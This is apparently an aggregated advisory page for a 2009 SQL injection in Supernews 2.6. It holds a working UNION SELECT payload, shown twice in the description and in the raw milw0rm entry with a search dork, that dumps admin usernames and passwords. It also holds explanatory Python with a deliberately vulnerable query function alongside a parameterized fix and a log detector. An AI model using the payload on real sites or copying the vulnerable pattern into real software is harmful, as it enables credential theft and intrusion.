Vendor: Supernews
By: Observing and DD3str0y3r
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Supernews
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: NO
Related CWE: N/A
CPE: 2.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Supernews 2.6 SQL Injection Vulnerability

A SQL injection vulnerability exists in Supernews 2.6. The 'news_any_id' URL parameter is placed into a database query without sanitization, so an attacker who sends a crafted value for it can read data from the database. An example of such a request is: http://wwww.site.com/path/news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login--

Mitigation:

Developers should ensure that user input is validated and sanitized before it is used in SQL queries. For an identifier such as news_any_id, that means accepting only an integer and passing the value to the database through a parameterized query rather than string concatenation.
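To illustrate the mitigation and a matching detection check, here is an added example in Python (Supernews itself is a PHP script; this is not its code). It assumes an SQLite stand-in schema using the supernews_login table named in the advisory plus an assumed news table, and constructed access-log lines; it contrasts the concatenation flaw with an integer-validated, parameterized query and flags non-numeric news_any_id values in logs.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed in-memory stand-in for the Supernews database: supernews_login and
# its user/pass columns come from the advisory; the news table is an assumption.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE supernews_login (user TEXT, pass TEXT);
INSERT INTO news VALUES (12, 'Version 2.6 released');
INSERT INTO supernews_login VALUES ('admin', 'constructed-secret');
"""
# The news_any_id value from the advisory's URL as the server sees it after
# URL decoding ('+' becomes a space).
ADVISORY_PAYLOAD = ("12 union select 1,2,3,4,5,concat_ws(0x3a,user,pass),7,8 "
                    "from supernews_login--")
# Constructed access-log lines: one normal request and one carrying the payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Jun/2009:10:00:00 +0000] "GET /path/?news_any_id=12 HTTP/1.1" 200 512',
    '10.0.0.9 - - [03/Jun/2009:10:00:07 +0000] "GET /path/?news_any_id=12+union+select'
    '+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login-- HTTP/1.1" 500 0',
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def fetch_news_vulnerable(conn, news_any_id):
    # The flaw the advisory describes: the raw value is pasted into the query, so
    # everything after "12" is parsed as SQL. SQLite rejects this exact payload
    # (UNION column counts differ, no MySQL concat_ws), but it still treated it as SQL.
    return conn.execute("SELECT id, title FROM news WHERE id = " + news_any_id).fetchall()

def fetch_news_safe(conn, news_any_id):
    # Mitigation: accept only a decimal integer, then bind it as a parameter so
    # the value can never change the statement's structure.
    if not re.fullmatch(r"[0-9]{1,10}", news_any_id):
        raise ValueError("news_any_id must be a positive integer")
    return conn.execute("SELECT id, title FROM news WHERE id = ?",
                        (int(news_any_id),)).fetchall()

def flag_suspicious_requests(log_lines):
    # Detection: any news_any_id that is not a plain integer deserves an alert,
    # whether or not the application has been fixed.
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match:
            for value in parse_qs(urlsplit(match.group(1)).query).get("news_any_id", []):
                if not re.fullmatch(r"[0-9]+", value):
                    hits.append(value)
    return hits
```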

Exploit-DB raw data:

###############################################################
	Supernews 2.6 SQL Injection Vulnerability
###############################################################

Download: http://phpbrasil.com/script-download/vT0FaOCySSH/5817

###############################################################
	Discovered by Observing and DD3str0y3r
	   [Collaps3 CREW] - Made In Brazil
###############################################################

Dork: Supernews 2.6

#######################################################################################################################################

Example:
http://wwww.site.com/path/news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login--

#######################################################################################################################################

gr33tz: W4n73d, M4v3RiCk, 0xpoint, Ferror, Red Eye, Lady_lara and all my friends

# milw0rm.com [2009-06-03]